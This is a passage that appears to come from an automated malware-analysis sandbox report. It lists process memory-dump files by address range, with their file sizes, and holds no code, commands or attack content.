                                                                                          • memory/5288-7535-0x000001D82F7D0000-0x000001D82F7DA000-memory.dmp

                                                                                            Filesize

                                                                                            40KB

                                                                                          • memory/5288-7534-0x000001D82F800000-0x000001D82F8B5000-memory.dmp

                                                                                            Filesize

                                                                                            724KB

                                                                                          • memory/5288-7533-0x000001D82F7E0000-0x000001D82F7FC000-memory.dmp

                                                                                            Filesize

                                                                                            112KB

                                                                                          • memory/5288-7512-0x000001D82D140000-0x000001D82D162000-memory.dmp

                                                                                            Filesize

                                                                                            136KB

                                                                                          • memory/5892-7885-0x00000000007D0000-0x0000000000C8A000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/6472-7617-0x00000000007D0000-0x0000000000C8A000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/6472-7614-0x00000000007D0000-0x0000000000C8A000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/6904-8685-0x0000028376CC0000-0x0000028376D75000-memory.dmp

                                                                                            Filesize

                                                                                            724KB

                                                                                          • memory/7164-7775-0x00000000007D0000-0x0000000000C8A000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB

                                                                                          • memory/7164-7772-0x00000000007D0000-0x0000000000C8A000-memory.dmp

                                                                                            Filesize

                                                                                            4.7MB